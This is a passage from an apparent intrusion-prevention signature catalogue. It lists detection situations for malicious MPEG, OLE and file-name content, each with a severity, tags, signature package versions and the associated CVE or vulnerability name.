Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection
Description:
Back to top

File-MPEG_RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: RealNetworks-RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption
Description:
Back to top

File-MPEG_Suspicious-File

About this situation: A suspicious MPEG file detected
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-MPEG_VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow

About this situation: Suspicious MP4 file detected.
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
Description:
Back to top

File-MPEG_Windows-Media-Decompression-Vulnerability-CVE-2013-0077

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2013-02, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Windows-Media-Decompression-Vulnerability-CVE-2013-0077
Description:
Back to top

File-Name_File-Name-Beginning-With-Possible-Command-Injection-Characters

About this situation: Detected a file name beginning with possible command injection characters
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Description:
Back to top

File-Name_Known-Phishing-Word-Documents

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: File Name
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Vulnerability: Known-Phishing-Word-Documents
Description:
Back to top

File-Name_Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: File Name
Severity: 7
Tags: Windows, Any Hardware, MS2023-11, CVE2023, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1651-5242
Last changed: sgpkg-ips-1651-5242
Vulnerability: Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413
Description:
Back to top

File-Name_OpenSSL-C-rehash-Script-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1480-5242
Last changed: sgpkg-ips-1480-5242
Vulnerability: OpenSSL-C_rehash-Script-Command-Injection-Vulnerability
Description:
Back to top

File-Name_OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenSSL
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Vulnerability: OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability
Description:
Back to top

File-Name_Potentially-Suspicious-Double-Extension-In-File-Name

About this situation: Suspicious double extension in file name
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1843-5242
Description:
Back to top

File-Name_Potentially-Suspicious-Non-Printables-In-File-Name

About this situation: Suspicious non-printable characters in file name
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1834-5242
Description:
Back to top

File-Name_RDP-Session-Configuration-File

About this situation: RDP session configuration file transfer detected
Context: File Name
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Description:
Back to top

File-Name_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2025, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, 1st Most Recent Update, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1873-5242
Last changed: sgpkg-ips-1873-5242
Vulnerability: SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
Description:
Back to top

File-Name_Search-Connector-Description-File-Transfer

About this situation: A transfer of a Search Connector Description (*.searchConnector-ms) file detect
Context: File Name
Severity: 2
Tags: Windows, Any Hardware, CVE2025, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: Microsoft-Windows-NTLM-Relay-CVE-2025-24054
Description:
Back to top

File-Name_Shared-Variables

About this situation: Shared variables for the filename context
Context: File Name
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, 1st Most Recent Update, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1873-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-Name_Shell-Library-Description-File-Transfer

About this situation: A transfer of a Shell Library Description (*.library-ms) file detect
Context: File Name
Severity: 2
Tags: Windows, Any Hardware, CVE2025, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: Microsoft-Windows-NTLM-Relay-CVE-2025-24054
Description:
Back to top

File-Name_Suspicious-Double-Extension-In-File-Name

About this situation: Suspicious double extension in file name
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Description:
Back to top

File-Name_Suspicious-Executable-Filename

About this situation: An executable with suspicious name detected
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-1861-5242
Vulnerability: Suspicious-Executable-Filename
Description:
Back to top

File-Name_Suspicious-Non-Printables-In-File-Name

About this situation: Suspicious non-printable characters in file name
Context: File Name
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1775-5242
Last changed: sgpkg-ips-1834-5242
Description:
Back to top

File-Name_VBScript-File-Transfer

About this situation: A transfer of a VBScript file detected
Context: File Name
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: VBScript-File-Transfer
Description:
Back to top

File-Name_Windows-Script-File-Transfer

About this situation: A transfer of a Windows Script File (WSF) detected
Context: File Name
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Windows-Script-File-Transfer
Description:
Back to top

File-OLE_Adobe-Flash-Embedded-In-OLE-Document

About this situation: Detected a download of Adobe Flash content embedded in OLE Structured Storage document
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

File-OLE_Adobe-Flash-Exploit-CVE-2011-0609

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: OLE File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

File-OLE_Adobe-Flash-Exploit-CVE-2011-0609-2

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

File-OLE_Adobe-Flash-Exploit-CVE-2011-0611

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0611
Description:
Back to top

File-OLE_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1122-5242
Vulnerability: Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
Description:
Back to top

File-OLE_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player Desktop Runtime detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1048-5242
Vulnerability: Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
Description:
Back to top

File-OLE_Adobe-Flash-Player-Vulnerability-CVE-2012-1535

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-470-5211
Vulnerability: Adobe-Flash-Player-Vulnerability-CVE-2012-1535
Description:
Back to top

File-OLE_Adobe-Photoshop-7-Image

About this situation: Adobe Photoshop image download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Adobe Photoshop, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess HMI Designer detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow
Description:
Back to top

File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess HMI Designer detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption
Description:
Back to top

File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess HMI Designer detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow
Description:
Back to top

File-OLE_Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Apple QuickTime, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
Description:
Back to top

File-OLE_Apple-QuickTime-FPX-File-Handling-Integer-Overflow

About this situation: Detects integer overflow exploits against Apple QuickTime
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
Description:
Back to top

File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption
Description:
Back to top

File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-754-5211
Vulnerability: Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption
Description:
Back to top

File-OLE_Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in KeyView IDOL Viewing SDK detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Autonomy KeyView IDOL Viewing SDK, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-460-5211
Vulnerability: Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
Description:
Back to top

File-OLE_Barracuda-ESG-Parameter-Injection-CVE-2023-7102

About this situation: An attempt to exploit a vulnerability in Barracuda ESG detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Barracuda ESG, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1705-5242
Vulnerability: Barracuda-ESG-Parameter-Injection-CVE-2023-7102
Description: CVE References: CVE-2023-7102
Back to top

File-OLE_Business-Objects-Crystal-Reports-Rpt-File-Handling

About this situation: An attempt to exploit a vulnerability in Business Objects Crystal Reports detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Crystal Reports, Business Objects Crystal Enterprise, Microsoft Visual Studio .NET 2002, Microsoft Visual Studio .NET 2003, Microsoft Visual Studio 2005, MS2007-09, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Business-Objects-Crystal-Reports-Rpt-File-Handling
Description:
Back to top

File-OLE_Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in ClamAV Project ClamAV detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2024, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read
Description:
Back to top

File-OLE_Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in ClamAV
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Vulnerability: Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write
Description:
Back to top

File-OLE_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-OLE_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-OLE_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DOPSoft detected.
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Industrial Automation DOPSoft, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Vulnerability: Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DOPSoft detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Industrial Automation DOPSoft, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow
Description:
Back to top

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DOPSoft detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Industrial Automation DOPSoft, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption
Description:
Back to top

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DOPSoft detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Industrial Automation DOPSoft, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1651-5242
Vulnerability: Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Heap-Buffer-Overflow
Description:
Back to top

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DOPSoft detected.
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Industrial Automation DOPSoft, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1651-5242
Vulnerability: Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Heap-Buffer-Overflow
Description:
Back to top

File-OLE_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
Description:
Back to top

File-OLE_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-OLE_Embedded-Executable-File

About this situation: Executable file within OLE detected
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1652-5242
Vulnerability: Executable-File-In-Document
Description:
Back to top

File-OLE_Embedded-JavaScript-In-OLE

About this situation: An OLE file with embedded JavaScript detected
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-453-4333
Vulnerability: JavaScript-In-OLE
Description:
Back to top

File-OLE_Embedded-JavaScript-Obfuscated-Eval-Function

About this situation: An OLE file containing obfuscated JavaScript was detected
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-453-4333
Vulnerability: JavaScript-In-OLE
Description:
Back to top

File-OLE_Embedded-JavaScript-Obfuscated-Unescape-Function

About this situation: An OLE file containing obfuscated JavaScript was detected
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-453-4333
Vulnerability: JavaScript-In-OLE
Description:
Back to top

File-OLE_Embedded-TIFF-File

About this situation: An OLE file with embedded TIFF file detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, MS2013-12, CVE2013, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-552-5211
Vulnerability: Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Description:
Back to top

File-OLE_Embedded-Zip-Archive

About this situation: Embedded zip archive download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
Description:
Back to top

File-OLE_Excel-Memory-Corruption-CVE-2010-0823

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0823 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Excel-Memory-Corruption-CVE-2010-0823
Description:
Back to top

File-OLE_Generic-OLE-Package

About this situation: Generic OLE package file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_HTTP-Suspicious-Embedded-Zip-In-Excel

About this situation: An embedded zip content was seen in Exel OLE file
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Description:
Back to top

File-OLE_HTTP-Transfer-Over-Nonstandard-Port

About this situation: A OLE file was seen in a HTTP connection that uses a nonstandard port
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-604-5211
Description:
Back to top

File-OLE_Kingsoft-Writer-Font-Names-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Beijing Kingsoft Kingsoft Writer detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Kingsoft Writer, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-847-5242
Vulnerability: Kingsoft-Writer-Font-Names-Buffer-Overflow
Description:
Back to top

File-OLE_Malicious-Looking-Document

About this situation: Detected Malicious Document
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1243-5242
Description:
Back to top

File-OLE_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
Description:
Back to top

File-OLE_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Access detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Office Access, MS2010-07, CVE2010, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-ActiveX-Code-Execution-CVE-2012-0158

